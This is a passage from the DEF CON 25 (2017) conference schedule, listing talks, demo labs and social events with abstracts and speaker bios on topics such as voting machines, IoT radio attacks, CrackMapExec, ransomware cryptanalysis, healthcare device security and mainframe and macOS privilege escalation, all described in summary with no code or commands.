Sarah Zatko is the Chief Scientist at the Cyber Independent Testing Lab (CITL), where she develops testing protocols to assess the security and risk profile of commercial software. She also works on developing automated reporting mechanisms to make such information understandable and accessible to a variety of software consumers. The CITL is a non-profit organization dedicated to empowering consumers to understand risk in software products. Sarah has degrees in Math and Computer Science from MIT and Boston University. Prior to her position at CITL, she worked as a computer security professional in the public and private sector.

cyber-itl.org


Return to Index      -     

 

VMHV - Roman 1, Promenade Level - Friday - 15:00-15:45


Title:
Common misconceptions and false parallels about voting technology. We can do online banking and use ATMs, why cant we vote on touch screens or online?

Title: Common misconceptions and false parallels about voting technology. We can do online banking and use ATMs, why cant we vote on touch screens or online?

Joe Hall bio
Joseph Hall, Chief Technologist and Director of the Internet Architecture project at the Center for Democracy & Technology

Joseph Lorenzo Hall is the Chief Technologist and Director of the Internet Architecture project at the Center for Democracy & Technology, a Washington, DC-based non-profit advocacy organization dedicated to ensuring the internet remains open, innovative and free. Halls work focuses on the intersection of technology, law, and policy, working to ensure that technical considerations are appropriately embedded into legal and policy instruments. Supporting work across all of CDTs programmatic areas, Hall provides substantive technical expertise to CDTs programs, and interfaces externally with CDT supporters, stakeholders, academics, and technologists. Hall leads CDTs Internet Architecture project, which focuses on embedding human rights values into core internet standards and infrastructure, engaging technologists in policy work, and producing accessible technical material for policymakers.

Return to Index      -     

 

BHV - Pisa Room - Friday - 15:00-15:29


Title: Computational Chemistry on a Budget

Speakers: Mr. Br!ml3y

About Mr. Br!ml3y:
Mr_Br!ml3y is a DefCon Biohacking Village regular who is currently working on a PhD. from a research university in the Midwest. He also works in public sector network security to keep the lights on. His current research focuses on developing 3D computer models for contaminent transport in groundwater, with special emphasis on ionic contaminants (alkali metals and earths, halides). He has been exploring computational chemistry and nanochemistry to help with model development and bioinformatics as a side interest.

Abstract:
Determining effectiveness and fit of chemical compounds for human medical and health is a time-consuming and expensive process. One method for reducing time and expense is the use of computational chemistry to model compound-receptor binding, which helps rule out unpromising or suboptimal compounds. This presentation explores the fundamentals of computational chemistry for various applications and open-source programs available for use. Ab initio molecular modeling, molecular docking, and bioinformatics programs are discussed.



Return to Index      -     

 

DEFCON - Track 1 - Friday - 13:00-13:45


Controlling IoT devices with crafted radio signals

Friday at 13:00 in 101 Track

45 minutes | Demo, Tool

Caleb Madrigal Hacker, FireEye/Mandiant

In this talk, we'll be exploring how wireless communication works. We'll capture digital data live (with Software-Defined Radio), and see how the actual bits are transmitted. From here, we'll see how to view, listen to, manipulate, and replay wireless signals. We'll also look at interrupting wireless communication, and finally, we'll even generate new radio waves from scratch (which can be useful for fuzzing and brute force attacks). I'll also be demoing some brand new tools I've written to help in the interception, manipulation, and generation of digital wireless signals with SDR.

Caleb Madrigal
Caleb Madrigal is a programmer who enjoys hacking and mathing. He is currently working as a senior software engineer on Incident Response software at Mandiant/FireEye. Most of his recent work has been in Python, Jupyter, Javascript, and C. Caleb has been into security for a while... in high school, he wrote his own (bad) cryptography and steganography software. In college, he did a good bit of "informal pen testing". Recently, Caleb has been playing around with SDR, IoT hacking, packet crafting, and a good bit of math/probability/AI/ML.

@caleb_madrigal, calebmadrigal.com


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 15:30-16:00


Title:
Core Illumination: Traffic Analysis in Cyberspace

Author:
Kenneth Geers (Senior Research Scientist, Comodo)

Abstract:
The information security discipline devotes immense resources to developing and protecting a core set of protocols that encode and encrypt Internet communications. However, since the dawn of human conflict, simple Traffic Analysis (TA) has been used to circumvent innumerable security schemes. TA leverages metadata and hard-to-conceal network flow data related to the source, destination, size, frequency, and direction of information, from which eavesdroppers can often deduce a comprehensive intelligence analysis. TA is effective in both the hard and soft sciences, and provides an edge in economic, political, intelligence, and military affairs. Today, modern information technology, including the ubiquity of computers, and the interconnected nature of cyberspace, has made TA a global and universally accessible discipline. Further, due to privacy issues, it is also a global concern. Digital metadata, affordable computer storage, and automated information processing now record and analyse nearly all human activities, and the scrutiny is growing more acute by the day. Corporate, law enforcement, and intelligence agencies have access to strategic datasets from which they can drill down to the tactical level at any moment. This paper discusses the nature of TA, how it has evolved in the Internet era, and demonstrates the power of high-level analysis based on a large cybersecurity dataset.

Bio:
Kenneth Geers (PhD, CISSP) is a Comodo Senior Research Scientist based in Toronto, Canada. Dr. Geers is also a NATO Cooperative Cyber Defence Centre of Excellence (CCD COE) Ambassador, a Non-Resident Senior Fellow at Atlantic Council, an Affiliate with the Digital Society Institute-Berlin, a member of the Transatlantic Cyber Forum, and a Visiting Professor at Taras Shevchenko National University of Kyiv in Ukraine. Kenneth spent 20 years in the U.S. Government, with time in the U.S. Army, at NSA, NCIS, and NATO, and was a Senior Global Threat Analyst at FireEye. He is the author Strategic Cyber Security, Editor of Cyber War in Perspective: Russian Aggression against Ukraine, Editor of The Virtual Battlefield: Perspectives on Cyber Warfare, Technical Expert to the Tallinn Manual, and author of many articles and chapters on cyber security.
Twitter handle of presenter(s): @KennethGeers

Return to Index      -     

 

Demolabs - Table 3 - Saturday - 14:00-15:50


CrackMapExec

Marcello Salvati

Saturday from 1400-1550 at Table Three

Audience: Network Defense and Offense

Ever needed to pentest a network with 10 gazillion hosts with a very limited time frame? Ever wanted to Mimikatz entire subnets? How about shelling entire subnets? How about dumping SAM hashes ? Share spidering? Keeping track of all the credentials you pillaged? (The list goes on!) And doing all of this in the stealthiest way possible? Well look no further than CrackMapExec! CrackMapExec (a.k.a CME) is a modular post-exploitation tool written in Python that helps automate assessing the security of *large* Active Directory networks. Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve it's functionality and allowing it to evade most endpoint protection, IDS and IPS solutions. Although meant to be used primarily for offensive purposes, CME can be used by blue teams as well to assess account privileges, find misconfigurations and simulate attack scenarios. In this demo the author will be showing off v4.0, a major update to the tool bringing more feature and capabilities than ever before! If you are interested in the latest and greatest Active Directory attacks/techniques, weaponizing them at scale and general cool AD stuff this is the demo for you!

https://github.com/byt3bl33d3r/CrackMapExec

Marcello Salvati
Marcello Salvati (@byt3bl33d3r) is a security consultant who's really good at writing bios. He's so good at writing bios that he was awarded the 'The Best Bio Ever from *insert date when bios became a thing* to 2017" award. (Totally legit award. Don't Google it, Bing it).

His boss Liz asked him about ten times to re-write his bio because "It was too good. He had to make it less good. We didn't want people to cry in shame when they read it. It was like a poem ... sniff.. *a single tear is shed*".

By day a security consultant, by night a tool developer who discovered a novel technique to turn tea, sushi and dank memes into somewhat functioning code he has recently devoted his attention to the wonderful rabbit hole that is Active Directory which has become his favorite thing to 0wn.


Return to Index      -     

 

BHV - Pisa Room - Friday - 17:00-17:29


Title: Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science

Speakers: David Bach

About David:
David Bach, MD
Founder and President, Platypus Institute
A Harvard-trained scientist, physician, and serial entrepreneur, Dr. Bach is the Founder and President of the Platypus Institute, an applied neuroscience research organization whose mission is to translate cutting-edge neuroscience discoveries into practical tools and programs that radically enhance the human experience. As an entrepreneur, Dr. Bach founded and built three healthcare technology companies, each of which became a $100M enterprise. He has also been a management consultant, a venture capitalist, a competitive martial artist and a professional cellist. He is also an avid biohacker.

Abstract:
During the past decade, a confluence of scientific breakthroughs in neuroimaging, biotechnology, cybernetics, sensor technology and data analytics have created a new tool in the self-improvement arsenal. Today, for the first time in history, we can “rewire” the human brain in highly targeted ways that dramatically enhance cognition, perception, creative ability, learning speeds and health. During this session, building largely on work from DARPA, we will explore emerging technologies you can use today to dramatically enhance your brain and your cognitive abilities. We will also take a look into the future of neurotech – and how it is going to fundamentally disrupt what it means to be human.



Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 12:00-12:59


Title:
Crossing the Border with a Burner Phone: A Lawyer Explains Legal & Security Issues at the Border

1200 Saturday
wendy
@wendyck

Crossing the Border with a Burner Phone: A Lawyer Explains Legal & Security Issues at the Border

For many people, crossing a border isn't a cause for concern. But with a recent uptick in device searches and requests for social media handles, a lot of bad advice has been circulating. Hear from a hacker lawyer about the legality of border searches- what can border agents ask you? Must you unlock a phone? Can you give a fake social media handle?

Return to Index      -     

 

Demolabs - Table 4 - Saturday - 14:00-15:50


Crypt-Keeper

Maurice Carey

Saturday from 1400-1550 at Table Four

Audience: Anyone who wants to run a service to securely exchange files.

Crypt-Keeper is a service for securely exchanging files.

Equipment Requirements (Network Needs, Displays, etc): A display or protector would be great. The app will be running on AWS, so a network connection will be needed as well.

https://github.com/mauricecarey/crypt-keeper

Maurice Carey
"Maurice is the Principle Software Engineer at TargetSmart, a small company focused on big data problems, where he is helping create and scale their customer facing software platform for future business growth. Previously, Maurice has worked as a Software Architect focusing on data analytics and micro-services, and as a software engineer at companies like General Motors and Amazon.com.

Maurice has been a speaker or presenter publicly at many local meet ups and small conferences, as well as presenting papers at the IEEE International Conference on Program Comprehension (ICPC), and IEEE Enterprise Distributed Object Computing (EDOC) conferences.

Maurice received a Bachelor's Degree in Computer Science and PhD in Computer Science from Arizona State University while establishing himself as an entrepreneur working his way through school writing code for various clients.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Friday - 16:30-17:30


Title:
Cryptanalysis in the Time of Ransomware

Author:
Mark Mager (Endgame)

Abstract:
Crypto has served an important role in securing sensitive data throughout the years, but ransomware has flipped this script on its head by leveraging crypto as a means to instead prevent users from accessing their own data. The crypto seen in ransomware covers a wide range of complexity of symmetric and asymmetric algorithms, but flaws in their implementation and key storage / transmission routines have left the door open for users to retrieve their data in certain cases. In this talk, I'll provide a glimpse into some of the more notable ransomware crypto implementations that have surfaced over the past few years and how their weaknesses were exploited by security researchers through reverse engineering and cryptanalysis.

Bio:
Mark is a Senior Malware Researcher for Endgame. Throughout his career in software engineering and computer security, he has served in prominent technical leadership roles in the research and development of advanced computer network operations tools and has provided malware analysis and reverse engineering subject matter expertise to a diverse range of government and commercial clients in the Washington, D.C. metropolitan area.
Twitter handle of presenter(s): @magerbomb
Website of presenter(s) or content: https://www.endgame.com/our-experts/mark-mager

Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Friday - 13:10-13:59


CVE IDs and How to Get Them

Daniel Adinolfi, Lead Cybersecurity Engineer at The MITRE Corporation
Anthony Singleton, Cyber Security Engineer at The MITRE Corporation

The Common Vulnerabilities and Exposures (CVE) program uniquely identifies and names publicly-disclosed vulnerabilities in software and other codebases. Whether you are a vulnerability researcher, a vendor, or a project maintainer, it has never been easier to have CVE IDs assigned to vulnerabilities you are disclosing or coordinating around. This presentation will be an opportunity to find out how to participate as well as a chance to offer your thoughts, questions, or feedback about CVE. Attendees will learn what is considered a vulnerability for CVE, how to assign CVE IDs to vulnerabilities, how to describe those vulnerabilities within CVE ID entries, how to submit those assignments, and where to get more information about CVE assignment.

Daniel Adinolfi (Twitter: @pkdan14850) is a Lead Cybersecurity Engineer at The MITRE Corporation. He works as part of the CVE Program as the CVE Numbering Authority (CNA) Coordinator and the Communications Lead. Daniel has a background in security operations and incident response and in developing information sharing programs, compliance programs, and security architectures. Daniel also writes poetry, plays games, and drinks a lot of coffee. He works in cybersecurity to pay the bills. Most of those bills are coffee and game-related.

Anthony Singleton recently completed his MS in Information Security and Policy Management at Carnegie Mellon University. He has worked for CERT-CC interning as a Cyber Workforce Developer and Vulnerability Analyst and is currently working at MITRE Corporation as a Cybersecurity Engineer with a focus in both the CVE and CWE efforts. Anthony is an aspiring Hacker working towards acquiring both the OSCP certificate and CEH certificate. He is a major New England Patriots fan and enjoys working on his Jeep Wrangler on his down time.


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Sunday - 11:30-12:00


Title:
Cypherpunks History

Author:
Ryan Lackey (ResetSecurity, Inc.)

Abstract:
We will go over the history of the 1990s cypherpunks and major topics discussed during that period -- including remailers, the first discussions of crypto currencies, and various forms of anonymous electronic markets. In addition, we will present a free archive of the mailing list and topics for future research.

Bio:
Ryan Lackey has been a cypherpunk for over 20 years. He founded the world's first offshore datahaven, HavenCo, on Sealand in 2000. He was involved with pre-cryptocurrency anonymous digital currencies backed with gold and other assets, and worked in Iraq, Afghanistan, and other conflict zones, bootstrapping a satellite and wireless communications company. Later, he founded a Y Combinator-backed startup, CryptoSeal, which he sold to Cloudflare in 2014. After working at Cloudflare for the following two years, he founded ResetSecurity, a travel security company, in 2016.
Twitter handle of presenter(s): @octal

Return to Index      -     

 

DEFCON - Modena Room - Saturday - 20:00-21:59


D0 No H4RM: A Healthcare Security Conversation

Saturday at 20:00 - 22:00 in Modena Room

Evening Lounge

Christian "quaddi" Dameff MD MS Hacker

Jeff "r3plicant" Tully MD Hacker

Beau Woods Deputy director of the Cyber Statecraft Initiative in the Brent Scowcroft on International Security

Joshua Corman Director of the Cyber Statecraft Initiative at the Atlantic Council's Brent Scowcroft Center

Michael C. McNeil Privacy and security expert, Philips Healthcare

Jay Radcliffe Senior Security Consultant and Researcher, Rapid7

Suzanne Schwartz, MD, MBA Associate Director for Science & Strategic Partnerships, FDA'Center for Devices & Radiological Health (CDRH)

Previously a free-flowing, fast moving conversation between old friends and new colleagues in a dimly lit and alcohol soaked off-strip hotel suite, the third annual edition of "D0 No H4rm" moves to the better lit and even more alcohol soaked auspices of the DEF CON 25 Evening Lounge for a two hour session that links makers, breakers, and wonks in the healthcare space for a continuation of what may be one of the most important conversations in all of hackerdom- how to ensure the safety and security of patients in a system more connected and vulnerable than ever before. Join physician researchers quaddi and r3plicant, and researcher turned wonk Beau Woods as they offer an update on the state of the field and curate an interactive and engaging panel before breaking out the bottle and getting social. Continuing a tradition that has sparked professional connections, project ideas, and enduring friendships, "D0 No H4rm" aims to offer a prescription for the future, and we want your voice to be heard.

Christian "quaddi" Dameff MD MS
Christian (quaddi) Dameff is an emergency medicine physician, former open capture the flag champion, prior DEF CON speaker, and researcher. Published works include topics such as therapeutic hypothermia after cardiac arrest, novel drug targets for myocardial infarction patients, and other Emergency Medicine related works with an emphasis on CPR optimization. Security research topics including hacking critical healthcare infrastructure and medical devices. This is his thirteenth DEF CON.

@cdameffMD

Jeff "r3plicant" Tully MD
Jeff Tully is an anesthesiologist, pediatrician, and researcher with an interest in understanding the ever-growing intersections between health care and technology. Prior to medical school he worked on "hacking" the genetic code of Salmonella bacteria to create anti-cancer tools, and throughout medical training has remained involved in the conversations and projects that will secure healthcare and protect our patients as we face a brave new world of remote care, implantable medical devices, and biohacking.

@jefftullymd

Beau Woods
Beau Woods is the deputy director of the Cyber Statecraft Initiative in the Brent Scowcroft on International Security. His focus is the intersection of cyber (yes, he'll drink for that) security and the human condition, primarily around Cyber Safety. This comes out of the I Am The Cavalry initiative, ensuring the connected technology that can impact life and safety is worthy of our trust. Beau started his career working at a regional health provider, protecting patients by defending medical data and devices.

@beauwoods

Joshua Corman
Joshua Corman is the director of the Cyber Statecraft Initiative at the Atlantic Council's Brent Scowcroft Center and a founder of I am The Cavalry (dot org). Corman previously served as CTO for Sonatype, director of security intelligence for Akamai, and in senior research and strategy roles for The 451 Group and IBM Internet Security Systems. He co-founded @RuggedSoftware and @IamTheCavalry to encourage new security approaches in response to the world's increasing dependence on digital infrastructure. Josh's unique approach to security in the context of human factors, adversary motivations, and social impact has helped position him as one of the most trusted names in security. He also serving as an adjunct faculty for Carnegie Mellon's Heinz College and on the 2016 HHS Cybersecurity Task Force.


Return to Index      -     

 

BHV - Pisa Room - Saturday - 14:00-14:59


Title: Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode

Speaker: Awesome Folks from Various BioHacking Podcasts

Moderators:
Moderators: c00p3r and cur50r from Dangerous Minds Podcast; McStuff from 2 Cyborgs and a Microphone; Sciaticnerd from Security Endeavours.

Abstract:
For this panel, two of the hosts of “Dangerous Minds Podcast” will be joined by one of the Hosts of “Two Cyborgs and a Microphone” and Sciaticnerd from "Security Endeavours" will be recording a normal episode with a mystery guest and or guests to celebrate the 100th episode of DMP, and our first live recording. Join us for the learning, stay for the laughs, without editing out our goofs, and turn the tables on everyone and ask your own questions as well. To which we can all learn together. It’s going to be a little bit fun, a little bit of learning, and a lot of laughs as always. Come out and join us, and bring your own spark! And perhaps go away with more.



Return to Index      -     

 

DEFCON - Track 3 - Friday - 15:00-15:45


Dark Data

Friday at 15:00 in Track 3

45 minutes

Svea Eckert NDR

Andreas Dewes PhD

A judge with preferences for hard core porn, a police officer investigating a cyber-crime, a politician ordering burn out medication - this kind of very personal and private information is on the market. Get sold to who is willing to pay for.

In a long time experiment, with the help of some social engineering techniques, we were able to get our hands on the most private data you can find on the internet. Click stream data of three million German citizens. They contain every URL they have looked at, every second, every hour, every day for 31 days. In our talk we will not only show how we got that data, but how you can de-anonymize it with some simple techniques.

This data is collected worldwide by big companies, whose legal purpose is to sell analytics and insights for marketers and businesses. In the shadow of Google and Facebook, companies have evolved, their names unknown to a broader public but making billions of dollars with your data. The new oil of the 20th century.

Our experiment shows in a drastic way, what the youngest decision reversing the Broadband Privacy Rule means. What the consequences for everyday life could be, when ISPs are allowed to sell your browsing data. And why that piece of regulation from the FCC was so important regarding privacy and constitutional rights.

Svea Eckert
Svea Eckert works as a freelance journalist for Germany's main public service broadcaster "Das Erste" (ARD). She is researching and reporting investigative issues for the PrimeTime news shows and high quality documentaries. Her main focus lies on new technology: computer and network security, digital economics and data protection.

Bigger projects and documentaries are for example "Superpower Wikileaks?" (ARD), "Facebook - Billion Dollar Business friendship" (ARD), her first book "Monitored and spied out: Prism, NSA, Facebook & Co" and in 2015 "Netwars" (ARD). Svea Eckert studied "Journalism and Communications" and Economics in Hamburg. She completed her journalistic training at NDR, Hamburg and Hannover.

Twitter: @sveckert
Website: www.sveaeckert.de

Andreas Dewes
Andreas Dewes is a trained physicist with a PhD in experimental quantum computing and a degree in quantitative economics. He has a passion for data analysis and software development. He has received numerous awards for his work on data analysis and his work on data privacy and big data has been featured in the national and international press.

Twitter: @japh44
Github: adewes


Return to Index      -     

 

DEFCON - Capri Room - Saturday - 15:00-16:59


DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd

Saturday at 15:00 - 17:00 in Capri Room

Lounge Format

Representative James Langevin (D-RI)

Representative Will Hurd (R-TX)

Ever wondered if there was such thing as a “hacker-friendly” member of Congress? We found some and convinced them to come to DEF CON so you can meet them too! In this first-of-its-kind DEF CON session, two of the most hacker-friendly Congress critters will join DEF CON for an engaging and interactive session with the security research community.

Join the Atlantic Council’s Cyber Statecraft Initiative for a candid discussion with Representatives Will Hurd (R-TX) and James Langevin (D-RI). The two Congressmen will share their thoughts on the latest developments in cybersecurity policymaking on the Hill and provide a unique opportunity for the audience to ask questions, exchange ideas, and maybe even answer some of the Congressmen’s questions.

Rep. Will Hurd (R-TX)
Rep Hurd was born and raised in San Antonio, Texas. He attended John Marshall High School and Texas A&M University, where he majored in Computer Science and served as Student Body President.

After college, Will served as an undercover officer in the CIA in the Middle East and South Asia for nearly a decade, collecting intelligence that influenced the National Security agenda. Upon leaving the CIA, he became a Senior Advisor with a cybersecurity firm, covering a wide range of complex challenges faced by manufacturers, financial institutions, retailers, and critical infrastructure owners. He was also a partner with a strategic advisory firm helping businesses expand into international markets.

In 2015, Will was elected to the 114th Congress and currently serves on the Committee of Oversight and Government Reform and chairs the Information Technology Subcommittee. He also sits on the Committee on Homeland Security and is the Vice Chair of the Border and Maritime Security Subcommittee. In 2017, Will was appointed by Speaker Ryan to serve on the House Permanent Select Intelligence Committee, to replace Representative Mike Pompeo upon his confirmation as Director of the CIA.

Rep. James Langevin (D-RI)
Rep. Langevin first ran for office in 1986, when he was elected a Delegate to Rhode Island’s Constitutional Convention and served as its secretary. Two years later, he won election to the Rhode Island House of Representatives.

In 1994, Langevin defeated a Republican incumbent to become the nation’s youngest Secretary of State. He transformed the office into “the people’s partner in government” and took on the challenge of reforming Rhode Island’s outdated election system. Langevin also established the state’s Public Information Center and, with Brown University, published “Access Denied,” which examined the General Assembly’s compliance with the Open Meetings Law and documented routine and widespread violations.

In 1998, Langevin easily won re-election to his second term as Secretary of State, achieving the largest plurality of any general officer in this century, and in 2000, he made a successful run for the U.S. House of Representatives, where he has served the Second Congressional District ever since.

Langevin graduated from Rhode Island College and earned a Master’s Degree in Public Administration from the Kennedy School of Government at Harvard University. He resides in Warwick, Rhode Island


Return to Index      -     

 

DEFCON - Track 1 - Sunday - 15:00-14:59


DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd

Sunday at 15:00 in 101 Track

Representative James Langevin (D-RI)

Representative Will Hurd (R-TX)

Joshua Corman Director of the Cyber Statecraft Initiative at the Atlantic Council's Brent Scowcroft Center

The past year has seen major disruptions at the intersection of security and society. “Cybersecurity” has been thrust into the public consciousness frighteningly widely and quickly. Issues of public policy impact our colleagues and our community, beyond the technology layer. Some in the public policy community are actively encouraging our community to engage, recognizing the need for a technically literate voice of reason from the security research community. DEF CON is proud to host two members of Congress, who braved their way from DC to DEF CON as ambassadors from their community to ours.

Joshua Corman will engage Rep. Jim Langevin (D-RI) and Rep. Will Hurd (R-TX), in a candid, on-the-record “fireside chat” style conversation. DEF CON attendees will hear their perspectives on the state of cyber policy and what can be done to improve technical literacy in the dialogs. The members will also reflect on their experience at DEF CON, hanging out with hackers, and how they can make their voice known in the public policy conversation.

Rep. Will Hurd (R-TX)
Rep Hurd was born and raised in San Antonio, Texas. He attended John Marshall High School and Texas A&M University, where he majored in Computer Science and served as Student Body President.

After college, Will served as an undercover officer in the CIA in the Middle East and South Asia for nearly a decade, collecting intelligence that influenced the National Security agenda. Upon leaving the CIA, he became a Senior Advisor with a cybersecurity firm, covering a wide range of complex challenges faced by manufacturers, financial institutions, retailers, and critical infrastructure owners. He was also a partner with a strategic advisory firm helping businesses expand into international markets.

In 2015, Will was elected to the 114th Congress and currently serves on the Committee of Oversight and Government Reform and chairs the Information Technology Subcommittee. He also sits on the Committee on Homeland Security and is the Vice Chair of the Border and Maritime Security Subcommittee. In 2017, Will was appointed by Speaker Ryan to serve on the House Permanent Select Intelligence Committee, to replace Representative Mike Pompeo upon his confirmation as Director of the CIA.

Rep. James Langevin (D-RI)
Rep. Langevin first ran for office in 1986, when he was elected a Delegate to Rhode Island’s Constitutional Convention and served as its secretary. Two years later, he won election to the Rhode Island House of Representatives.

In 1994, Langevin defeated a Republican incumbent to become the nation’s youngest Secretary of State. He transformed the office into “the people’s partner in government” and took on the challenge of reforming Rhode Island’s outdated election system. Langevin also established the state’s Public Information Center and, with Brown University, published “Access Denied,” which examined the General Assembly’s compliance with the Open Meetings Law and documented routine and widespread violations.

In 1998, Langevin easily won re-election to his second term as Secretary of State, achieving the largest plurality of any general officer in this century, and in 2000, he made a successful run for the U.S. House of Representatives, where he has served the Second Congressional District ever since.

Langevin graduated from Rhode Island College and earned a Master’s Degree in Public Administration from the Kennedy School of Government at Harvard University. He resides in Warwick, Rhode Island


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 16:00-16:45


Dealing the perfect hand - Shuffling memory blocks on z/OS

Saturday at 16:00 in 101 Track

45 minutes | Demo, Tool

Ayoul3 Pentester, Wavestone

Follow me on a journey where we p0wn one of the most secure platforms on earth. A giant mammoth that still powers the most critical business functions around the world: The Mainframe! Be it a wire transfer, an ATM withdrawal, or a flight booking, you can be sure that you've used the trusted services of a Mainframe at least once during the last 24 hours. In this talk, I will present methods of privilege escalation on IBM z/OS: How to leverage a simple access to achieve total control over the machine and impersonate other users. If you are interested in mainframes or merely curious to see a what a shell looks like on MVS, you're welcome to tag along.

Ayoul3
Ayoub is a pentester working for Wavestone, a consulting firm based in France. He got interested in Mainframe security in 2014 when, during an audit, he noticed the big security gap between this platform and standard systems like Windows and Unix. A gap that makes little sense since z/OS has been around for a while and is used by most major companies to perform critical business operations: wire transfer, claim refunds, bookings, etc.

If you want to test some of the tools showcased during the talk, you can check out his tools: https://github.com/ayoul3/

@ayoul3__


Return to Index      -     

 

DEFCON - Track 2 - Friday - 14:00-14:45


Death By 1000 Installers; on macOS, it's all broken!

Friday at 14:00 in Track 2

45 minutes | Demo, Exploit

Patrick Wardle Chief Security Researcher, Synack

Ever get an uneasy feeling when an installer asks for your password? Well, your gut was right! The majority of macOS installers & updaters are vulnerable to a wide range of priv-esc attacks.

It began with the discovery that Apple's OS updater could be abused to bypass SIP (CVE-2017-6974). Next, turns out Apple's core installer app may be subverted to load unsigned dylibs which may elevate privileges to root.

And what about 3rd-party installers? I looked at what's installed on my Mac, and ahhh, so many bugs!

Firewall, Little Snitch: EoP via race condition of insecure plist
Anti-Virus, Sophos: EoP via hijack of binary component
Browser, Google Chrome: EoP via script hijack
Virtualization, VMWare Fusion: EoP via race condition of insecure script
IoT, DropCam: EoP via hijack of binary component
and more!

...and 3rd-party auto-update frameworks like Sparkle -yup vulnerable too!

Though root is great, we can't bypass SIP nor load unsigned kexts. However with root, I discovered one could now trigger a ring-0 heap-overflow that provides complete system control.

Though the talk will discuss a variety of discovery mechanisms, 0days, and macOS exploitation techniques, it won't be all doom & gloom. We'll end by discussing ways to perform authorized installs/upgrades that don't undermine system security."

Patrick Wardle
Patrick Wardle is the Chief Security Researcher at Synack, and founder of Objective-See. Having worked at NASA and the NSA, and as well as presented at many security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick's focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware. In his personal time, Patrick collects OS X malware and writes free OS X security tools.

@patrickwardle, objective-see.com


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 15:00-15:59


Title:
Death Numbers in Surgical room, Attacking Anesthesia Equipment.

1500 Friday
Michael Hudson
Death Numbers in Surgical room, Attacking Anesthesia Equipment.

"Possibility of introducing malicious code in General Electric's Datex-Ohmeda Equipment, which are used in surgeries such as Anesthesia Equipment.
These equipment monitor all vital signs during a surgical operation. The model of the monitor is the G/1500213 and has 2 RJ-45 inputs, which connect to a PC (which in most of the hospitals visited uses a version of windows),
and from this PC to a central server. All Hospitals visited use Oracle database and HL7 protocol and Dicom (tcp-ip) protocol."

Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Friday - 15:00-15:55


Deceptacon: Wi-Fi Deception in under $5

No description available


Return to Index      -     

 

DEFCON - Track 1 - Thursday - 16:00-17:45


DEF CON 101 Panel

Thursday at 16:00 in 101 Track

105 minutes | Hacker History, Audience Participation

HighWiz Founder, DC101

Malware Unicorn

Niki7a Director of Content & Coordination, DEF CON

Roamer CFP Vocal Antagonizer, DEF CON

Wiseacre

Shaggy

The DEF CON panel is the place to go to learn about the many facets of DEF CON and to begin your DEF CONian Adventure. Here you will begin your adventure that will include more than just listening in the talk tracks. You can get hands-on experience in the Villages and witness amazing feats of programming in Demo Labs. You may even display your own powers by participating in a contest or two in the Events and Contest Area. The panel will give you what you need to know to navigate DEF CON to your best advantage. We have speakers who will regale you with tales of how they came to be at DEF CON and (hopefully) inspire you with their personal experiences. Oh yeah, there is the time honored "Name the Noob", with lots of laughs and even some prizes.

HighWiz
Born of glitter and moon beams, HighWiz is the things that dreams are made of and nightmares long to be... Years ago, with the help of some very awesome people, he set about to create an event that would give the n00bs of DEF CON a place to feel welcomed and further their own pursuit of knowledge. HighWiz is the fabled Man on the Mountain whom people seek to gain a taste of his forbidden knowledge. He is a rare sighting at DEF CON only to be glimpsed by those lucky few.

Malware Unicorn
As a girl growing up, she was told she could be anything so she decided to be a unicorn. Ever since, she has made it her mission to ensure the truth is out there. Do not attempt to use malware pickup lines on her as she will pull them apart and you risk having your face impaled. Though she is fierce, she is also graceful, peaceful and determined. She is also an awesome artist.

Niki7a
There is truly only one sorceress that ensures the machinations of Def Con continue to move. She is both in tune with the magic and digital functions and is the power behind the CFP board from start to finish as well as the coordination of so many other activities behind the curtain. She works tirelessly year-round to make sure everything runs smoothly. Also, she is fun at parties and awesome AF.

@niki7a

Roamer
Appearing in a cloud of (cigarette) smoke, Roamer is a man full of whiskey and ideas. He has appeared at DEF CON since before (almost) the beginning. He is a renown author, speaker, pontificator and is famous for giving the most entertaining Worldwide Wardrive talk. He is also the Grand Vizier of All Things Vendor - you are welcome.

Wiseacre
Wiseacre was introduced to DEF CON by Roamer. Though he appeared at his first DEF CON because of the Capture the Flag contest, Roamer and HighWiz showed him how to make DEF CON so much more than simply attending the talks. From then on he made a point to participate in as much as he could. Of course, this was all within the limits of social anxiety so, if it allowed participation as a wallflower, he was in! Now, he wants to make sure everyone else gets to know as much as possible about this year's conference. In his private life, Mike hacks managers and is happy anyone listens to him at all. Mike would like to thank Highwiz for everything.

Shaggy
Shaggy has the Voice of Barry White, the brains of Albert Einstein and the soul of Bea Arthur. He has a few philosophies on life: He believes that while the righteous keep moving forward, those with clean hands become stronger and stronger . That the field of battle between God and Satan is the human soul. It is in the soul that the battle rages every moment of life. He also believes that one should Start by doing what's necessary; then do what's possible; and suddenly you are doing the impossible. Because You learn to speak by speaking, to study by studying, to run by running, to work by working, and just so, you learn to love by loving. All those who think to learn in any other way deceive themselves.


Return to Index      -     

 

Night Life - Track 3 - Thursday - 20:30-24:00


Title:
DEF CON Movie Night

DEF CON Movie Night
Return to Index      -     

 

Night Life - Track 3 - Friday - 20:30-24:00


Title:
DEF CON Movie Night

DEF CON Movie Night
Return to Index      -     

 

Night Life - Track 3 - Saturday - 20:30-24:00


Title:
DEF CON Movie Night

DEF CON Movie Night
Return to Index      -     

 

Night Life - Lobby Bar - Friday - 18:00-19:00


Title:
DEFCON 25 Meetup for /r/Defcon

DEFCON 25 Meetup
Alrighty friends, it's that time again to plan out our gathering at DC25! Our meetups have steadily been gaining traction each year, and I am hoping that we can make this one our biggest one to date.
As with the past couple of years, it's always a bit tricky to find a time and a place that is going to work perfectly for everybody because of the incredible amount of options for people to see/do. I am open to suggestions if you all think that there are better spots for us to meetup and socialize/drink.

Here are the details, ya filthy hackers:
Location: Lobby Bar - Caesars Palace Hotel and Casino
